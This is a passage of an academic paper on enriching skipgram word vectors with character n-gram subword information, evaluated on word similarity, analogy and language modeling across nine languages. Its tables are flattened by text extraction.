morphology of words, by assigning a dis- tinct vector to each word. This is a limitation, especially for languages with large vocabular- ies and many rare words. In this paper, we pro- pose a new approach based on the skipgram model, where each word is represented as a bag of character n-grams. A vector represen- tation is associated to each character n-gram; words being represented as the sum of these representations. Our method is fast, allow- ing to train models on large corpora quickly and allows us to compute word representations for words that did not appear in the training data. We evaluate our word representations on nine different languages, both on word sim- ilarity and analogy tasks. By comparing to recently proposed morphological word repre- sentations, we show that our vectors achieve state-of-the-art performance on these tasks. 1 Introduction Learning continuous representations of words has a long history in natural language processing (Rumel- hart et al., 1988). These representations are typ- ically derived from large unlabeled corpora using co-occurrence statistics (Deerwester et al., 1990; Schütze, 1992; Lund and Burgess, 1996). A large body of work, known as distributional semantics, has studied the properties of these methods (Turney ∗The two first authors contributed equally. et al., 2010; Baroni and Lenci, 2010). In the neural network community, Collobert and Weston (2008) proposed to learn word embeddings using a feed- forward neural network, by predicting a word based on the two words on the left and two words on the right. More recently, Mikolov et al. (2013b) pro- posed simple log-bilinear models to learn continu- ous representations of words on very large corpora efficiently. Most of these techniques represent each word of the vocabulary by a distinct vector, without param- eter sharing. In particular, they ignore the internal structure of words, which is an important limitation for morphologically rich languages, such as Turk- ish or Finnish. For example, in French or Spanish, most verbs have more than forty different inflected forms, while the Finnish language has fifteen cases for nouns. These languages contain many word forms that occur rarely (or not at all) in the training corpus, making it difficult to learn good word rep- resentations. Because many word formations follow rules, it is possible to improve vector representations for morphologically rich languages by using charac- ter level information. In this paper, we propose to learn representations for character n-grams, and to represent words as the sum of the n-gram vectors. Our main contribution is to introduce an extension of the continuous skip- gram model (Mikolov et al., 2013b), which takes into account subword information. We evaluate this model on nine languages exhibiting different mor- phologies, showing the benefit of our approach. 135 Transactions of the Association for Computational Linguistics, vol. 5, pp. 135–146, 2017. Action Editor: Hinrich Schütze. Submission batch: 9/2016; Revision batch: 12/2016; Published 6/2017. c©2017 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. 2 Related work Morphological word representations. In recent years, many methods have been proposed to incor- porate morphological information into word repre- sentations. To model rare words better, Alexan- drescu and Kirchhoff (2006) introduced factored neural language models, where words are repre- sented as sets of features. These features might in- clude morphological information, and this technique was succesfully applied to morphologically rich lan- guages, such as Turkish (Sak et al., 2010). Re- cently, several works have proposed different com- position functions to derive representations of words from morphemes (Lazaridou et al., 2013; Luong et al., 2013; Botha and Blunsom, 2014; Qiu et al., 2014). These different approaches rely on a morphological decomposition of words, while ours does not. Similarly, Chen et al. (2015) introduced a method to jointly learn embeddings for Chinese words and characters. Cui et al. (2015) proposed to constrain morphologically similar words to have similar representations. Soricut and Och (2015) described a method to learn vector representations of morphological transformations, allowing to ob- tain representations for unseen words by applying these rules. Word representations trained on mor- phologically annotated data were introduced by Cot- terell and Schütze (2015). Closest to our approach, Schütze (1993) learned representations of character four-grams through singular value decomposition, and derived representations for words by summing the four-grams representations. Very recently, Wi- eting et al. (2016) also proposed to represent words using character n-gram count vectors. However, the objective function used to learn these representa- tions is based on paraphrase pairs, while our model can be trained on any text corpus. Character level features for NLP. Another area of research closely related to our work are character- level models for natural language processing. These models discard the segmentation into words and aim at learning language representations directly from characters. A first class of such models are recur- rent neural networks, applied to language model- ing (Mikolov et al., 2012; Sutskever et al., 2011; Graves, 2013; Bojanowski et al., 2015), text nor- malization (Chrupała, 2014), part-of-speech tag- ging (Ling et al., 2015) and parsing (Ballesteros et al., 2015). Another family of models are convolu- tional neural networks trained on characters, which were applied to part-of-speech tagging (dos San- tos and Zadrozny, 2014), sentiment analysis (dos Santos and Gatti, 2014), text classification (Zhang et al., 2015) and language modeling (Kim et al., 2016). Sperr et al. (2013) introduced a language model based on restricted Boltzmann machines, in which words are encoded as a set of character n- grams. Finally, recent works in machine translation have proposed using subword units to obtain repre- sentations of rare words (Sennrich et al., 2016; Lu- ong and Manning, 2016). 3 Model In this section, we propose our model to learn word representations while taking into account morphol- ogy. We model morphology by considering subword units, and representing words by a sum of its charac- ter n-grams. We will begin by presenting the general framework that we use to train word vectors, then present our subword model and eventually describe how we handle the dictionary of character n-grams. 3.1 General model We start by briefly reviewing the continuous skip- gram model introduced by Mikolov et al. (2013b), from which our model is derived. Given a word vo- cabulary of size W , where a word is identified by its index w ∈ {1, ...,W}, the goal is to learn a vectorial representation for each word w. Inspired by the distributional hypothesis (Harris, 1954), word representations are trained to predict well words that appear in its context. More formally, given a large training corpus represented as a sequence of words w1, ...,wT , the objective of the skipgram model is to maximize the following log-likelihood: T∑ t=1 ∑ c∈Ct log p(wc | wt), where the context Ct is the set of indices of words surrounding word wt. The probability of observing a context word wc given wt will be parameterized using the aforementioned word vectors. For now, let us consider that we are given a scoring function s which maps pairs of (word, context) to scores in R. 136 One possible choice to define the probability of a context word is the softmax: p(wc | wt) = es(wt, wc) ∑W j=1 e s(wt, j) . However, such a model is not adapted to our case as it implies that, given a word wt, we only predict one context word wc. The problem of predicting context words can in- stead be framed as a set of independent binary clas- sification tasks. Then the goal is to independently predict the presence (or absence) of context words. For the word at position t we consider all context words as positive examples and sample negatives at random from the dictionary. For a chosen context position c, using the binary logistic loss, we obtain the following negative log-likelihood: log ( 1 + e−s(wt, wc) ) + ∑ n∈Nt,c log ( 1 + es(wt, n) ) , where Nt,c is a set of negative examples sampled from the vocabulary. By denoting the logistic loss function ` : x 7→ log(1 + e−x), we can re-write the objective as: T∑ t=1   ∑ c∈Ct `(s(wt, wc)) + ∑ n∈Nt,c `(−s(wt, n))   . A natural parameterization for the scoring function s between a word wt and a context word wc is to use word vectors. Let us define for each word w in the vocabulary two vectors uw and vw in Rd. These two vectors are sometimes referred to as input and out- put vectors in the literature. In particular, we have vectors uwt and vwc , corresponding, respectively, to words wt and wc. Then the score can be computed as the scalar product between word and context vec- tors as s(wt,wc) = u>wtvwc . The model described in this section is the skipgram model with negative sampling, introduced by Mikolov et al. (2013b). 3.2 Subword model By using a distinct vector representation for each word, the skipgram model ignores the internal struc- ture of words. In this section, we propose a different scoring function s, in order to take into account this information. Each word w is represented as a bag of character n-gram. We add special boundary symbols < and > at the beginning and end of words, allowing to dis- tinguish prefixes and suffixes from other character sequences. We also include the word w itself in the set of its n-grams, to learn a representation for each word (in addition to character n-grams). Taking the word where and n = 3 as an example, it will be represented by the character n-grams: and the special sequence . Note that the sequence , corresponding to the word her is different from the tri-gram her from the word where. In practice, we extract all the n-grams for n greater or equal to 3 and smaller or equal to 6. This is a very simple approach, and different sets of n-grams could be considered, for example taking all prefixes and suffixes. Suppose that you are given a dictionary of n- grams of size G. Given a word w, let us denote by Gw ⊂ {1, . . . ,G} the set of n-grams appearing in w. We associate a vector representation zg to each n-gram g. We represent a word by the sum of the vector representations of its n-grams. We thus ob- tain the scoring function: s(w,c) = ∑ g∈Gw z>g vc. This simple model allows sharing the representa- tions across words, thus allowing to learn reliable representation for rare words. In order to bound the memory requirements of our model, we use a hashing function that maps n-grams to integers in 1 to K. We hash character sequences using the Fowler-Noll-Vo hashing function (specifi- cally the FNV-1a variant).1 We set K = 2.106 be- low. Ultimately, a word is represented by its index in the word dictionary and the set of hashed n-grams it contains. 4 Experimental setup 4.1 Baseline In most experiments (except in Sec. 5.3), we compare our model to the C implementation 1 http://www.isthe.com/chongo/tech/comp/fnv 137 of the skipgram and cbow models from the word2vec2 package. 4.2 Optimization We solve our optimization problem by perform- ing stochastic gradient descent on the negative log likelihood presented before. As in the baseline skipgram model, we use a linear decay of the step size. Given a training set containing T words and a number of passes over the data equal to P , the step size at time t is equal to γ0(1 − tTP ), where γ0 is a fixed parameter. We carry out the optimiza- tion in parallel, by resorting to Hogwild (Recht et al., 2011). All threads share parameters and update vectors in an asynchronous manner. 4.3 Implementation details For both our model and the baseline experiments, we use the following parameters: the word vectors have dimension 300. For each positive example, we sam- ple 5 negatives at random, with probability propor- tional to the square root of the uni-gram frequency. We use a context window of size c, and uniformly sample the size c between 1 and 5. In order to sub- sample the most frequent words, we use a rejection threshold of 10−4 (for more details, see (Mikolov et al., 2013b)). When building the word dictionary, we keep the words that appear at least 5 times in the training set. The step size γ0 is set to 0.025 for the skipgram baseline and to 0.05 for both our model and the cbow baseline. These are the default values in the word2vec package and work well for our model too. Using this setting on English data, our model with character n-grams is approximately 1.5× slower to train than the skipgram baseline. Indeed, we process 105k words/second/thread versus 145k words/second/thread for the baseline. Our model is implemented in C++, and is publicly available.3 4.4 Datasets Except for the comparison to previous work (Sec. 5.3), we train our models on Wikipedia data.4 We downloaded Wikipedia dumps in nine languages: Arabic, Czech, German, English, 2 https://code.google.com/archive/p/word2vec 3 https://github.com/facebookresearch/fastText 4 https://dumps.wikimedia.org Spanish, French, Italian, Romanian and Russian. We normalize the raw Wikipedia data using Matt Mahoney’s pre-processing perl script.5 All the datasets are shuffled, and we train our models by doing five passes over them. 5 Results We evaluate our model in five experiments: an eval- uation of word similarity and word analogies, a com- parison to state-of-the-art methods, an analysis of the effect of the size of training data and of the size of character n-grams that we consider. We will de- scribe these experiments in detail in the following sections. 5.1 Human similarity judgement We first evaluate the quality of our representations on the task of word similarity / relatedness. We do so by computing Spearman’s rank correlation co- efficient (Spearman, 1904) between human judge- ment and the cosine similarity between the vector representations. For German, we compare the dif- ferent models on three datasets: GUR65, GUR350 and ZG222 (Gurevych, 2005; Zesch and Gurevych, 2006). For English, we use the WS353 dataset in- troduced by Finkelstein et al. (2001) and the rare word dataset (RW), introduced by Luong et al. (2013). We evaluate the French word vectors on the translated dataset RG65 (Joubarne and Inkpen, 2011). Spanish, Arabic and Romanian word vectors are evaluated using the datasets described in (Hassan and Mihalcea, 2009). Russian word vectors are eval- uated using the HJ dataset introduced by Panchenko et al. (2016). We report results for our method and baselines for all datasets in Table 1. Some words from these datasets do not appear in our training data, and thus, we cannot obtain word representation for these words using the cbow and skipgram baselines. In order to provide comparable results, we propose by default to use null vectors for these words. Since our model exploits subword information, we can also compute valid representations for out-of-vocabulary words. We do so by taking the sum of its n-gram vectors. When OOV words are represented using 5 http://mattmahoney.net/dc/textdata 138 sg cbow sisg- sisg AR WS353 51 52 54 55 DE GUR350 61 62 64 70 GUR65 78 78 81 81 ZG222 35 38 41 44 EN RW 43 43 46 47 WS353 72 73 71 71 ES WS353 57 58 58 59 FR RG65 70 69 75 75 RO WS353 48 52 51 54 RU HJ 59 60 60 66 Table 1: Correlation between human judgement and similarity scores on word similarity datasets. We train both our model and the word2vec baseline on normalized Wikipedia dumps. Evaluation datasets contain words that are not part of the training set, so we represent them using null vectors (sisg-). With our model, we also compute vectors for unseen words by summing the n-gram vectors (sisg). null vectors we refer to our method as sisg- and sisg otherwise (Subword Information Skip Gram). First, by looking at Table 1, we notice that the pro- posed model (sisg), which uses subword informa- tion, outperforms the baselines on all datasets except the English WS353 dataset. Moreover, computing vectors for out-of-vocabulary words (sisg) is al- ways at least as good as not doing so (sisg-). This proves the advantage of using subword information in the form of character n-grams. Second, we observe that the effect of using char- acter n-grams is more important for Arabic, Ger- man and Russian than for English, French or Span- ish. German and Russian exhibit grammatical de- clensions with four cases for German and six for Russian. Also, many German words are compound words; for instance the nominal phrase “table ten- nis” is written in a single word as “Tischtennis”. By exploiting the character-level similarities between “Tischtennis” and “Tennis”, our model does not rep- resent the two words as completely different words. Finally, we observe that on the English Rare Words dataset (RW), our approach outperforms the sg cbow sisg CS Semantic 25.7 27.6 27.5 Syntactic 52.8 55.0 77.8 DE Semantic 66.5 66.8 62.3 Syntactic 44.5 45.0 56.4 EN Semantic 78.5 78.2 77.8 Syntactic 70.1 69.9 74.9 IT Semantic 52.3 54.7 52.3 Syntactic 51.5 51.8 62.7 Table 2: Accuracy of our model and baselines on word analogy tasks for Czech, German, English and Italian. We report results for semantic and syntactic analogies separately. baselines while it does not on the English WS353 dataset. This is due to the fact that words in the En- glish WS353 dataset are common words for which good vectors can be obtained without exploiting subword information. When evaluating on less fre- quent words, we see that using similarities at the character level between words can help learning good word vectors. 5.2 Word analogy tasks We now evaluate our approach on word analogy questions, of the form A is to B as C is to D, where D must be predicted by the models. We use the datasets introduced by Mikolov et al. (2013a) for English, by Svoboda and Brychcin (2016) for Czech, by Köper et al. (2015) for German and by Berardi et al. (2015) for Italian. Some questions con- tain words that do not appear in our training corpus, and we thus excluded these questions from the eval- uation. We report accuracy for the different models in Table 2. We observe that morphological informa- tion significantly improves the syntactic tasks; our approach outperforms the baselines. In contrast, it does not help for semantic questions, and even degrades the performance for German and Italian. Note that this is tightly related to the choice of the length of character n-grams that we consider. We show in Sec. 5.5 that when the size of the n-grams is chosen optimally, the semantic analogies degrade 139 DE EN ES FR GUR350 ZG222 WS353 RW WS353 RG65 Luong et al. (2013) - - 64 34 - - Qiu et al. (2014) - - 65 33 - - Soricut and Och (2015) 64 22 71 42 47 67 sisg 73 43 73 48 54 69 Botha and Blunsom (2014) 56 25 39 30 28 45 sisg 66 34 54 41 49 52 Table 3: Spearman’s rank correlation coefficient between human judgement and model scores for different methods using morphology to learn word representations. We keep all the word pairs of the evaluation set and obtain representations for out-of-vocabulary words with our model by summing the vectors of character n-grams. Our model was trained on the same datasets as the methods we are comparing to (hence the two lines of results for our approach). less. Another interesting observation is that, as ex- pected, the improvement over the baselines is more important for morphologically rich languages, such as Czech and German. 5.3 Comparison with morphological representations We also compare our approach to previous work on word vectors incorporating subword information on word similarity tasks. The methods used are: the recursive neural network of Luong et al. (2013), the morpheme cbow of Qiu et al. (2014) and the morphological transformations of Soricut and Och (2015). In order to make the results comparable, we trained our model on the same datasets as the meth- ods we are comparing to: the English Wikipedia data released by Shaoul and Westbury (2010), and the news crawl data from the 2013 WMT shared task for German, Spanish and French. We also compare our approach to the log-bilinear language model introduced by Botha and Blunsom (2014), which was trained on the Europarl and news com- mentary corpora. Again, we trained our model on the same data to make the results comparable. Us- ing our model, we obtain representations of out-of- vocabulary words by summing the representations of character n-grams. We report results in Table 3. We observe that our simple approach performs well relative to techniques based on subword information obtained from morphological segmentors. We also observe that our approach outperforms the Soricut and Och (2015) method, which is based on prefix and suffix analysis. The large improvement for Ger- man is due to the fact that their approach does not model noun compounding, contrary to ours. 5.4 Effect of the size of the training data Since we exploit character-level similarities between words, we are able to better model infrequent words. Therefore, we should also be more robust to the size of the training data that we use. In order to as- sess that, we propose to evaluate the performance of our word vectors on the similarity task as a func- tion of the training data size. To this end, we train our model and the cbow baseline on portions of Wikipedia of increasing size. We use the Wikipedia corpus described above and isolate the first 1, 2, 5, 10, 20, and 50 percent of the data. Since we don’t reshuffle the dataset, they are all subsets of each other. We report results in Fig. 1. As in the experiment presented in Sec. 5.1, not all words from the evaluation set are present in the Wikipedia data. Again, by default, we use a null vector for these words (sisg-) or compute a vec- tor by summing the n-gram representations (sisg). The out-of-vocabulary rate is growing as the dataset shrinks, and therefore the performance of sisg- and cbow necessarily degrades. However, the pro- posed model (sisg) assigns non-trivial vectors to previously unseen words. First, we notice that for all datasets, and all sizes, the proposed approach (sisg) performs better than 140 0 20 40 60 80 100 percentage of data 30 35 40 45 50 55 60 65 70 75 sp e a rm a n r a n k cbow sisg- sisg (a) DE-GUR350 0 20 40 60 80 100 percentage of data 15 20 25 30 35 40 45 50 sp e a rm a n r a n k cbow sisg- sisg (b) EN-RW Figure 1: Influence of size of the training data on performance. We compute word vectors following the proposed model using datasets of increasing size. In this experiment, we train models on a fraction of the full Wikipedia dump. the baseline. However, the performance of the base- line cbow model gets better as more and more data is available. Our model, on the other hand, seems to quickly saturate and adding more data does not always lead to improved results. Second, and most importantly, we notice that the proposed approach provides very good word vectors even when using very small training datasets. For in- stance, on the German GUR350 dataset, our model (sisg) trained on 5% of the data achieves better performance (66) than the cbow baseline trained on the full dataset (62). On the other hand, on the En- glish RW dataset, using 1% of the Wikipedia corpus we achieve a correlation coefficient of 45 which is better than the performance of cbow trained on the full dataset (43). This has a very important practi- cal implication: well performing word vectors can be computed on datasets of a restricted size and still work well on previously unseen words. In gen- eral, when using vectorial word representations in specific applications, it is recommended to retrain the model on textual data relevant for the applica- tion. However, this kind of relevant task-specific data is often very scarce and learning from a reduced amount of training data is a great advantage. 5.5 Effect of the size of n-grams The proposed model relies on the use of character n- grams to represent words as vectors. As mentioned in Sec. 3.2, we decided to use n-grams ranging from 3 to 6 characters. This choice was arbitrary, moti- vated by the fact that n-grams of these lengths will cover a wide range of information. They would in- clude short suffixes (corresponding to conjugations and declensions for instance) as well as longer roots. In this experiment, we empirically check for the in- fluence of the range of n-grams that we use on per- formance. We report our results in Table 4 for En- glish and German on word similarity and analogy datasets. We observe that for both English and German, our arbitrary choice of 3-6 was a reasonable deci- sion, as it provides satisfactory performance across languages. The optimal choice of length ranges depends on the considered task and language and should be tuned appropriately. However, due to the scarcity of test data, we did not implement any proper validation procedure to automatically select the best parameters. Nonetheless, taking a large range such as 3 − 6 provides a reasonable amount of subword information. This experiment also shows that it is important to include long n-grams, as columns corresponding to n ≤ 5 and n ≤ 6 work best. This is especially true for German, as many nouns are compounds made up from several units that can only be captured by longer character sequences. On analogy tasks, we observe that using larger n-grams helps for seman- tic analogies. However, results are always improved by taking n ≥ 3 rather than n ≥ 2, which shows that character 2-grams are not informative for that task. As described in Sec. 3.2, before computing 141 2 3 4 5 6 2 57 64 67 69 69 3 65 68 70 70 4 70 70 71 5 69 71 6 70 (a) DE-GUR350 2 3 4 5 6 2 59 55 56 59 60 3 60 58 60 62 4 62 62 63 5 64 64 6 65 (b) DE Semantic 2 3 4 5 6 2 45 50 53 54 55 3 51 55 55 56 4 54 56 56 5 56 56 6 54 (c) DE Syntactic 2 3 4 5 6 2 41 42 46 47 48 3 44 46 48 48 4 47 48 48 5 48 48 6 48 (d) EN-RW 2 3 4 5 6 2 78 76 75 76 76 3 78 77 78 77 4 79 79 79 5 80 79 6 80 (e) EN Semantic 2 3 4 5 6 2 70 71 73 74 73 3 72 74 75 74 4 74 75 75 5 74 74 6 72 (f) EN Syntactic Table 4: Study of the effect of sizes of n-grams considered on performance. We compute word vectors by using character n-grams with n in {i, . . . ,j} and report performance for various values of i and j. We eval- uate this effect on German and English, and represent out-of-vocabulary words using subword information. character n-grams, we prepend and append special positional characters to represent the beginning and end of word. Therefore, 2-grams will not be enough to properly capture suffixes that correspond to con- jugations or declensions, since they are composed of a single proper character and a positional one. 5.6 Language modeling In this section, we describe an evaluation of the word vectors obtained with our method on a language modeling task. We evaluate our language model on five languages (CS, DE, ES, FR, RU) using the datasets introduced by Botha and Blunsom (2014). Each dataset contains roughly one million training tokens, and we use the same preprocessing and data splits as Botha and Blunsom (2014). Our model is a recurrent neural network with 650 LSTM units, regularized with dropout (with proba- bility of 0.5) and weight decay (regularization pa- rameter of 10−5). We learn the parameters using the Adagrad algorithm with a learning rate of 0.1, clipping the gradients which have a norm larger than 1.0. We initialize the weight of the network in the range [−0.05,0.05], and use a batch size of 20. Two baselines are considered: we compare our ap- proach to the log-bilinear language model of Botha and Blunsom (2014) and the character aware lan- guage model of Kim et al. (2016). We trained word vectors with character n-grams on the training set of the language modeling task and use them to ini- tialize the lookup table of our language model. We report the test perplexity of our model without using pre-trained word vectors (LSTM), with word vectors pre-trained without subword information (sg) and with our vectors (sisg). The results are presented in Table 5. We observe that initializing the lookup table of the language model with pre-trained word represen- tations improves the test perplexity over the base- line LSTM. The most important observation is that using word representations trained with subword in- formation outperforms the plain skipgram model. We observe that this improvement is most signifi- cant for morphologically rich Slavic languages such as Czech (8% reduction of perplexity over sg) and Russian (13% reduction). The improvement is less significant for Roman languages such as Spanish (3% reduction) or French (2% reduction). This shows the importance of subword information on the language modeling task and exhibits the usefulness 142 CS DE ES FR RU Vocab. size 46k 37k 27k 25k 63k CLBL 465 296 200 225 304 CANLM 371 239 165 184 261 LSTM 366 222 157 173 262 sg 339 216 150 162 237 sisg 312 206 145 159 206 Table 5: Test perplexity on the language modeling task, for 5 different languages. We compare to two state of the art approaches: CLBL refers to the work of Botha and Blunsom (2014) and CANLM refers to the work of Kim et al. (2016). of the vectors that we propose for morphologically rich languages. 6 Qualitative analysis 6.1 Nearest neighbors. We report sample qualitative results in Table 7. For selected words, we show nearest neighbors accord- ing to cosine similarity for vectors trained using the proposed approach and for the skipgram base- line. As expected, the nearest neighbors for com- plex, technical and infrequent words using our ap- proach are better than the ones obtained using the baseline model. 6.2 Character n-grams and morphemes We want to qualitatively evaluate whether or not the most important n-grams in a word correspond to morphemes. To this end, we take a word vector that we construct as the sum of n-grams. As de- scribed in Sec. 3.2, each word w is represented as the sum of its n-grams: uw = ∑ g∈Gw zg. For each n-gram g, we propose to compute the restricted rep- resentation uw\g obtained by omitting g: uw\g = ∑ g′∈G−{g} zg′. We then rank n-grams by increasing value of cosine between uw and uw\g. We show ranked n-grams for selected words in three languages in Table 6. For German, which has a lot of compound nouns, we observe that the most important n-grams cor- word n-grams autofahrer fahr fahrer auto freundeskreis kreis kreis> grund sprachschule schul hschul sprach tageslicht licht gesl tages anarchy chy ness kind politeness polite ness> eness> EN unlucky nlucky lifetime life star submarine marine sub marin transform trans nir fini FR finissent ent> finiss finiss sions> Table 6: Illustration of most important character n- grams for selected words in three languages. For each word, we show the n-grams that, when re- moved, result in the most different representation. respond to valid morphemes. Good examples in- clude Autofahrer (car driver) whose most important n-grams are Auto (car) and Fahrer (driver). We also observe the separation of compound nouns into mor- phemes in English, with words such as lifetime or starfish. However, for English, we also observe that n-grams can correspond to affixes in words such as kindness or unlucky. Interestingly, for French we ob- serve the inflections of verbs with endings such as ais>, ent> or ions>. 6.3 Word similarity for OOV words As described in Sec. 3.2, our model is capable of building word vectors for words that do not appear in the training set. For such words, we simply aver- age the vector representation of its n-grams. In or- der to assess the quality of these representations, we analyze which of the n-grams match best for OOV words by selecting a few word pairs from the En- glish RW similarity dataset. We select pairs such that one of the two words is not in the training vo- cabulary and is hence only represented by its n- grams. For each pair of words, we display the cosine similarity between each pair of n-grams that appear 143 query tiling tech-rich english-born micromanaging eateries dendritic sisg tile tech-dominated british-born micromanage restaurants dendrite flooring tech-heavy polish-born micromanaged eaterie dendrites sg bookcases technology-heavy most-capped defang restaurants epithelial built-ins .ixic ex-scotland internalise delis p53 Table 7: Nearest neighbors of rare words using our representations and skipgram. These hand picked examples are for illustration. Figure 2: Illustration of the similarity between character n-grams in out-of-vocabulary words. For each pair, only one word is OOV, and is shown on the x axis. Red indicates positive cosine, while blue negative. 144 in the words. In order to simulate a setup with a larger number of OOV words, we use models trained on 1% of the Wikipedia data as in Sec. 5.4. The re- sults are presented in Fig. 2. We observe interesting patterns, showing that sub- words match correctly. Indeed, for the word chip, we clearly see that there are two groups of n-grams in microcircuit that match well. These roughly cor- respond to micro and circuit, and n-grams in be- tween don’t match well. Another interesting ex- ample is the pair rarity and scarceness. Indeed, scarce roughly matches rarity while the suffix -ness matches -ity very well. Finally, the word preado- lescent matches young well thanks to the -adolesc- subword. This shows that we build robust word rep- resentations where prefixes and suffixes can be ig- nored if the grammatical form is not found in the dictionary. 7 Conclusion In this paper, we investigate a simple method to learn word representations by taking into account subword information. Our approach, which incor- porates character n-grams into the skipgram model, is related to an idea that was introduced by Schütze (1993). Because of its simplicity, our model trains fast and does not require any preprocessing or super- vision. We show that our model outperforms base- lines that do not take into account subword informa- tion, as well as methods relying on morphological analysis. We will open source the implementation of our model, in order to facilitate comparison of fu- ture work on learning subword representations. Acknowledgements We thank Marco Baroni, Hinrich Schütze and the anonymous reviewers for their insightful comments. References Andrei Alexandrescu and Katrin Kirchhoff. 2006. Fac- tored neural language models. In Proc. NAACL. Miguel Ballesteros, Chris Dyer, and Noah A. Smith. 2015. Improved transition-based parsing by model- ing characters instead of words with LSTMs. In Proc. EMNLP. Marco Baroni and Alessandro Lenci. 2010. Distribu- tional memory: A general framework for corpus-based semantics. Computational Linguistics, 36(4):673– 721. Giacomo Berardi, Andrea Esuli, and Diego Marcheg- giani. 2015. Word embeddings go to Italy: a com- parison of models and training datasets. Italian Infor- mation Retrieval Workshop. Piotr Bojanowski, Armand Joulin, and Tomáš Mikolov. 2015. Alternative structures for character-level RNNs. In Proc. ICLR. Jan A. Botha and Phil Blunsom. 2014. Compositional morphology for word representations and language modelling. In Proc. ICML. Xinxiong Chen, Lei Xu, Zhiyuan Liu, Maosong Sun, and Huanbo Luan. 2015. Joint learning of character and word embeddings. In Proc. IJCAI. Grzegorz Chrupała. 2014. Normalizing tweets with edit scripts and recurrent neural embeddings. In Proc. ACL. Ronan Collobert and Jason Weston. 2008. A unified ar- chitecture for natural language processing: Deep neu- ral networks with multitask learning. In Proc. ICML. Ryan Cotterell and Hinrich Schütze. 2015. Morphologi- cal word-embeddings. In Proc. NAACL. Qing Cui, Bin Gao, Jiang Bian, Siyu Qiu, Hanjun Dai, and Tie-Yan Liu. 2015. KNET: A general frame- work for learning word embedding using morpholog- ical knowledge. ACM Transactions on Information Systems, 34(1):4:1–4:25. Scott Deerwester, Susan T. Dumais, George W. Furnas, Thomas K. Landauer, and Richard Harshman. 1990. Indexing by latent semantic analysis. Journal of the American Society for Information Science, 41(6):391– 407. Cicero Nogueira dos Santos and Maira Gatti. 2014. Deep convolutional neural networks for sentiment analysis of short texts. In Proc. COLING. Cicero Nogueira dos Santos and Bianca Zadrozny. 2014. Learning character-level representations for part-of- speech tagging. In Proc. ICML. Lev Finkelstein, Evgeniy Gabrilovich, Yossi Matias, Ehud Rivlin, Zach Solan, Gadi Wolfman, and Eytan Ruppin. 2001. Placing search in context: The concept revisited. In Proc. WWW. Alex Graves. 2013. Generating sequences with recurrent neural networks. arXiv preprint arXiv:1308.0850. Iryna Gurevych. 2005. Using the structure of a concep- tual network in computing semantic relatedness. In Proc. IJCNLP. Zellig S Harris. 1954. Distributional structure. Word, 10(2-3):146–162. Samer Hassan and Rada Mihalcea. 2009. Cross-lingual semantic relatedness using encyclopedic knowledge. In Proc. EMNLP. 145 Colette Joubarne and Diana Inkpen. 2011. Comparison of semantic similarity for different languages using the google n-gram corpus and second-order co-occurrence measures. In Proc. Canadian Conference on Artificial Intelligence. Yoon Kim, Yacine Jernite, David Sontag, and Alexan- der M Rush. 2016. Character-aware neural language models. In Proc. AAAI. Maximilian Köper, Christian Scheible, and Sabine Schulte im Walde. 2015. Multilingual reliability and “semantic” structure of continuous word spaces. Proc. IWCS 2015. Angeliki Lazaridou, Marco Marelli, Roberto Zamparelli, and Marco Baroni. 2013. Compositionally derived representations of morphologically complex words in distributional semantics. In Proc. ACL. Wang Ling, Chris Dyer, Alan W. Black, Isabel Trancoso, Ramon Fermandez, Silvio Amir, Luis Marujo, and Tiago Luis. 2015. Finding function in form: Com- positional character models for open vocabulary word representation. In Proc. EMNLP. Kevin Lund and Curt Burgess. 1996. Producing high-dimensional semantic spaces from lexical co- occurrence. Behavior Research Methods, Instruments, & Computers, 28(2):203–208. Minh-Thang Luong and Christopher D. Manning. 2016. Achieving open vocabulary neural machine translation with hybrid word-character models. In Proc. ACL. Thang Luong, Richard Socher, and Christopher D. Man- ning. 2013. Better word representations with recur- sive neural networks for morphology. In Proc. CoNLL. Tomáš Mikolov, Ilya Sutskever, Anoop Deoras, Hai-Son Le, Stefan Kombrink, and Jan Černocký. 2012. Sub- word language modeling with neural networks. Tech- nical report, Faculty of Information Technology, Brno University of Technology. Tomáš Mikolov, Kai Chen, Greg D. Corrado, and Jeffrey Dean. 2013a. Efficient estimation of word representa- tions in vector space. arXiv preprint arXiv:1301.3781. Tomáš Mikolov, Ilya Sutskever, Kai Chen, Greg S. Cor- rado, and Jeff Dean. 2013b. Distributed representa- tions of words and phrases and their compositionality. In Adv. NIPS. Alexander Panchenko, Dmitry Ustalov, Nikolay Arefyev, Denis Paperno, Natalia Konstantinova, Natalia Loukachevitch, and Chris Biemann. 2016. Hu- man and machine judgements for russian semantic relatedness. In Proc. AIST. Siyu Qiu, Qing Cui, Jiang Bian, Bin Gao, and Tie-Yan Liu. 2014. Co-learning of word representations and morpheme representations. In Proc. COLING. Benjamin Recht, Christopher Re, Stephen Wright, and Feng Niu. 2011. Hogwild: A lock-free approach to parallelizing stochastic gradient descent. In Adv. NIPS. David E. Rumelhart, Geoffrey E. Hinton, and Ronald J. Williams. 1988. Neurocomputing: Foundations of research. chapter Learning Representations by Back- propagating Errors, pages 696–699. MIT Press. Haşim Sak, Murat Saraclar, and Tunga Gungör. 2010. Morphology-based and sub-word language modeling for turkish speech recognition. In Proc. ICASSP. Hinrich Schütze. 1992. Dimensions of meaning. In Proc. IEEE Conference on Supercomputing. Hinrich Schütze. 1993. Word space. In Adv. NIPS. Rico Sennrich, Barry Haddow, and Alexandra Birch. 2016. Neural machine translation of rare words with subword units. In Proc. ACL. Cyrus Shaoul and Chris Westbury. 2010. The Westbury lab Wikipedia corpus. Radu Soricut and Franz Och. 2015. Unsupervised mor- phology induction using word embeddings. In Proc. NAACL. Charles Spearman. 1904. The proof and measurement of association between two things. The American Jour- nal of Psychology, 15(1):72–101. Henning Sperr, Jan Niehues, and Alexander Waibel. 2013. Letter n-gram-based input encoding for contin- uous space language models. In Proc. of the Workshop on Continuous Vector Space Models and their Compo- sitionality at ACL. Ilya Sutskever, James Martens, and Geoffrey E Hinton. 2011. Generating text with recurrent neural networks. In Proc. ICML. Lukáš Svoboda and Tomáš Brychcin. 2016. New word analogy corpus for exploring embeddings of Czech words. In Proc. CICLING. Peter D. Turney, Patrick Pantel, et al. 2010. From fre- quency to meaning: Vector space models of semantics. Journal of Artificial Intelligence Research, 37(1):141– 188. John Wieting, Mohit Bansal, Kevin Gimpel, and Karen Livescu. 2016. CHARAGRAM: Embedding words and sentences via character n-grams. In Proc. EMNLP. Torsten Zesch and Iryna Gurevych. 2006. Automatically creating datasets for measures of semantic relatedness. In Proc. Workshop on Linguistic Distances. Xiang Zhang, Junbo Zhao, and Yann LeCun. 2015. Character-level convolutional networks for text clas- sification. In 